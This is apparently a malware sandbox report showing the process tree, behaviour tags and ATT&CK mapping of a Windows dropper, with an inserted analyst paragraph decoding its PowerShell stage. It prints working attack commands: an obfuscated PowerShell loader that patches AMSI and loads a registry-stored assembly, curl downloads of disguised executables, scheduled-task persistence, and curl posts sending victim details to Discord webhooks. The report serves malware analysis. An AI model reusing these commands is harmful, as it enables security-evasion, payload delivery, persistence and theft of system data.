      C:\Windows\System32\schtasks.exe
        cmd: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
        - Scheduled Task/Job: Scheduled Task
        C:\Windows\System32\Conhost.exe
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx

C:\Windows\system32\lsass.exe
  cmd: C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory

C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
  C:\Windows\system32\taskhostw.exe
    cmd: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth marker and the remainder of the command line are cut off in the source)
  cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UAuQcJGKypGD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yYJLRqLEqRoUcH,[Parameter(Position=1)][Type]$QTNCgivVQc)$sVLBoVxAEhm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+'g'+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+'yp'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+',P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+'e'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+',A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$sVLBoVxAEhm.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+'i'+'g'+','+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yYJLRqLEqRoUcH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$sVLBoVxAEhm.DefineMethod(''+'I'+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[C

The obfuscation is only string concatenation of one-character literals and [Char](n) casts. Decoded, the visible part builds a dynamic assembly named ReflectedDelegate with module InMemoryModule and type MyDelegateType (attributes "Class,Public,Sealed,AnsiClass,AutoClass", constructor "RTSpecialName,HideBySig,Public", implementation flags "Runtime,Managed", then a method "Invoke"). Those are the exact names used by PowerSploit's Get-DelegateType helper, which is how script-based loaders call unmanaged Windows APIs from PowerShell without Add-Type; combined with the SetThreadContext and WriteProcessMemory rows against dllhost.exe, the PowerShell stage is the injector, and the interesting payload is whatever came after the cut-off.
har](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](78)+'e'+[Char](119)+'Sl'+[Char](111)+'t'+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'',$QTNCgivVQc,$yYJLRqLEqRoUcH).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $sVLBoVxAEhm.CreateType();}$LUfPqQffFqxox=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'te'+'m'+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+''+'i'+'cros'+'o'+'ft'+'.'+''+[Char](87)+''+'i'+'n32'+'.'+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+'e'+[Char](77)+'et'+'h'+''+'o'+''+'d'+''+'s'+'');$aXaWoJrtimlFtD=$LUfPqQffFqxox.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+'dd'+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+'i'+'c'+',S'+[Char](116)+''+'a'+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qUZmQBWBRRVNkYkQgdk=UAuQcJGKypGD @([String])([IntPtr]);$ToChBmRYHztiJRtioFpvSu=UAuQcJGKypGD 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZzQuQiIppNe=$LUfPqQffFqxox.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+'2'+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$lDbCmJxOGgFUAP=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$ZzQuQiIppNe,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'rary'+[Char](65)+'')));$tAAdNBwavZOaSfhYg=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$ZzQuQiIppNe,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'alPr'+[Char](111)+'t'+[Char](101)+'c'+[Char](116)+'')));$jvOJQge=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lDbCmJxOGgFUAP,$qUZmQBWBRRVNkYkQgdk).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+'l'+[Char](108)+'');$QfynZrrWdLekAewLH=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$jvOJQge,[Object]('Am'+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+'f'+[Char](102)+''+'e'+''+'r'+'')));$bKOIucZbAQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAAdNBwavZOaSfhYg,$ToChBmRYHztiJRtioFpvSu).Invoke($QfynZrrWdLekAewLH,[uint32]8,4,[ref]$bKOIucZbAQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QfynZrrWdLekAewLH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAAdNBwavZOaSfhYg,$ToChBmRYHztiJRtioFpvSu).Invoke($QfynZrrWdLekAewLH,[uint32]8,0x20,[ref]$bKOIucZbAQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1C5D.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\$77-aachost.exe"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 2\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 34C081BFBE1DDA88F723\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 2\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 34C081BFBE1DDA88F723\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.execurl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ff9d0222e98,0x7ff9d0222ea4,0x7ff9d0222eb02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2292 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3912 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:82⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe b765834be7b61b3dd973bea0c0d7e5ab CS5xfzsoDUSBZ/cngqUv2A.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
  Filesize: 290B
  MD5: 02005e59af3fbd84f4a83968fc8da952
  SHA1: 40578ee448aa3109d026e84a8b12ee9a0479ce78
